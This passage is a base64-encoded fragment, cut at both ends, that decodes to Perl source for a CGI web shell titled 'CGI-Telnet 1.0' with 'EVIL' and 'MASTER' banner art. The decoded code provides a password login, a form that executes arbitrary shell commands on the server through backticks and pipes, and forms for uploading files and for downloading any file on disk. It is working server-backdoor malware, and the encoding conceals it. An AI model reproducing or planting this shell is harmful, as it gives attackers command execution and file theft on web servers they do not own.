JlZj0iVU5JVFhfVEVBTUBIT1RNQUlMLkNPTSI+SGVscDwvYT4NCjwvZm9udD48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8Zm9udCBjb2xvcj0iIzAwOTkwMCIgc2l6ZT0iMyI+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5TY3JlZW4NCnsNCgkkTWVzc2FnZSA9IHEkPHByZT48Zm9udCBjb2xvcj0iI2ZmMDAwMCI+IF9fX19fICBfX19fXyAgX19fX18gICAgICAgICAgX19fX18gICAgICAgIF8gICAgICAgICAgICAgICBfDQovICBfXyBcfCAgX18gXHxfICAgX3wgICAgICAgIHxfICAgX3wgICAgICB8IHwgICAgICAgICAgICAgfCB8DQp8IC8gIFwvfCB8ICBcLyAgfCB8ICAgX19fX19fICAgfCB8ICAgIF9fXyB8IHwgXyBfXyAgICBfX18gfCB8Xw0KfCB8ICAgIHwgfCBfXyAgIHwgfCAgfF9fX19fX3wgIHwgfCAgIC8gXyBcfCB8fCAnXyBcICAvIF8gXHwgX198DQp8IFxfXy9cfCB8X1wgXCBffCB8XyAgICAgICAgICAgfCB8ICB8ICBfXy98IHx8IHwgfCB8fCAgX18vfCB8Xw0KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+ICAgICAgICAgICAgICAgICAgICAgIF9fX19fXyAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQgY29sb3I9IiNBRTgzMDAiPsKpIDIwMDMsIEFzaGl5YW5lPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4NCiAgICAgICAgICAgICAgICAgICAuLSZxdW90OyAgICAgICZxdW90Oy0uDQogICAgICAgICAgICAgICAgICAvICAgVU5JVC1YICAgXA0KICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8DQogICAgICAgICAgICAgICAgIHwsICAuLS4gIC4tLiAgLHwNCiAgICAgICAgICAgICAgICAgfCApKF9vLyAgXG9fKSggfA0KICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8DQogICAgICAgKEBfICAgICAgIChfICAgICBeXiAgICAgXykNCiAgXyAgICAgKSBcPC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5cPC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+fCpFVklMKnw8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiPl9fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4vPC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5fX19fX19fX19fX19fX19fX19fX19fXw0KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjMDA5OTAwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxNQVNURVIvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPg0KICAgICAgICApXy8gICAgICAgIFwgICAgICAgICAgLyANCiAgICAgICAoQCAgICAgICAgICAgYC0tLS0tLS0tYA0KICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+DQokOw0KIycNCglwcmludCA8PEVORDsNCjxjb2RlPg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0ibG9naW4iPg0KbG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQo8L2NvZGU+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIGZvb3RlciBmb3IgdGhlIEhUTUwgUGFnZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUZvb3Rlcg0Kew0KCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFJldHJlaXZlcyB0aGUgdmFsdWVzIG9mIGFsbCBjb29raWVzLiBUaGUgY29va2llcyBjYW4gYmUgYWNjZXNzZXMgdXNpbmcgdGhlDQojIHZhcmlhYmxlICRDb29raWVzeycnfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEdldENvb2tpZXMNCnsNCglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOw0KCWZvcmVhY2ggJGNvb2tpZShAaHR0cGNvb2tpZXMpDQoJew0KCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7DQoJCSRDb29raWVzeyRpZH0gPSAkdmFsOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dvdXRTY3JlZW4NCnsNCglwcmludCAiPGNvZGU+Q29ubmVjdGlvbiBjbG9zZWQgYnkgZm9yZWlnbiBob3N0Ljxicj48YnI+PC9jb2RlPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2Fpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dvdXQNCnsNCglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llDQoJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCSZQcmludExvZ291dFNjcmVlbjsNCgkmUHJpbnRMb2dpblNjcmVlbjsNCgkmUHJpbnRMb2dpbkZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0DQojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0DQojIG1hdGNoIG9yIGlmIG5vIHBhc3N3b3JkIGlzIGVudGVyZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlcg0KIyB0byBsb2dpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dpbiANCnsNCglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZA0KCXsNCgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQoJZWxzZSAjIHBhc3N3b3JkIGRpZG4ndCBtYXRjaA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCQkmUHJpbnRMb2dpblNjcmVlbjsNCgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZA0KCQl7DQoJCQkmUHJpbnRMb2dpbkZhaWxlZE1lc3NhZ2U7DQoJCX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KJFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+DQokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpEb3dubG9hZDogPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQokUHJvbXB0IHVwbG9hZDxicj48YnI+DQpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPg0KT3B0aW9uczogJm5ic3A7PGlucHV0IHR5cGU9ImNoZWNrYm94IiBuYW1lPSJvIiB2YWx1ZT0ib3ZlcndyaXRlIj4NCk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8YnI+PGJyPg0KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9InVwbG9hZCI+DQo8L2Zvcm0+DQo8L2NvZGU+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bw0KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzDQojIG5ldmVyIGNhbGxlZCB3aGVuIHRoZSBzY3JpcHQgaXMgcnVubmluZyBvbiBOVC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBDb21tYW5kVGltZW91dA0Kew0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgkJcHJpbnQgPDxFTkQ7DQo8L3htcD4NCjxjb2RlPg0KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLg0KPGJyPktpbGxlZCBpdCENCjxjb2RlPg0KRU5EDQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlleGl0Ow0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBleGVjdXRlIGNvbW1hbmRzLiBJdCBkaXNwbGF5cyB0aGUgb3V0cHV0IG9mIHRoZQ0KIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQ0KIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluDQojIGFuIGludGVybmFsIHZhcmlhYmxlIGFuZCBpcyB1c2VkIGVhY2ggdGltZSBhIGNvbW1hbmQgaGFzIHRvIGJlIGV4ZWN1dGVkLiBUaGUNCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMNCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRXhlY3V0ZUNvbW1hbmQNCnsNCglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kDQoJew0KCQkjIHdlIGNoYW5nZSB0aGUgZGlyZWN0b3J5IGludGVybmFsbHkuIFRoZSBvdXRwdXQgb2YgdGhlDQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLg0KCQkNCgkJJE9sZERpciA9ICRDdXJyZW50RGlyOw0KCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkICQxIi4kQ21kU2VwLiRDbWRQd2Q7DQoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRPbGREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkT2xkRGlyXVwkICI7DQoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOw0KCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7DQoJCWlmKCEkV2luTlQpDQoJCXsNCgkJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7DQoJCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7DQoJCX0NCgkJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZA0KCQl7DQoJCQkkfD0xOw0KCQkJJENvbW1hbmQgLj0gIiB8IjsNCgkJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOw0KCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQ0KCQkJew0KCQkJCSRfID1+IHMvKFxufFxyXG4pJC8vOw0KCQkJCXByaW50ICIkX1xuIjsNCgkJCX0NCgkJCSR8PTA7DQoJCX0NCgkJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzDQoJCXsNCgkJCXByaW50IGAkQ29tbWFuZGA7DQoJCX0NCgkJaWYoISRXaW5OVCkNCgkJew0KCQkJYWxhcm0oMCk7DQoJCX0NCgkJcHJpbnQgIjwveG1wPiI7DQoJfQ0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gZG93bmxvYWQgdGhlIHNwZWNpZmllZCBmaWxlLiBUaGUgcGFnZSBhbHNvIGNvbnRhaW5zIGEgYXV0by1yZWZyZXNoDQojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlDQp7DQoJbG9jYWwoJEZpbGVVcmwpID0gQF87DQoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzDQoJew0KCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyDQoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCgkJJERvd25sb2FkTGluayA9ICIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZmPSRGaWxlVXJsJm89Z28iOw0KCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCXByaW50IDw8RU5EOw0KPGNvZGU+DQpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4NCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LA0KPGEgaHJlZj0iJERvd25sb2FkTGluayI+Q2xpY2sgSGVyZTwvYT4uDQo8L2NvZGU+DQpFTkQNCgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2UgIyBmaWxlIGRvZXNuJ3QgZXhpc3QNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCE8L2NvZGU+IjsNCgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2FuIGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlmKG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNURE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlK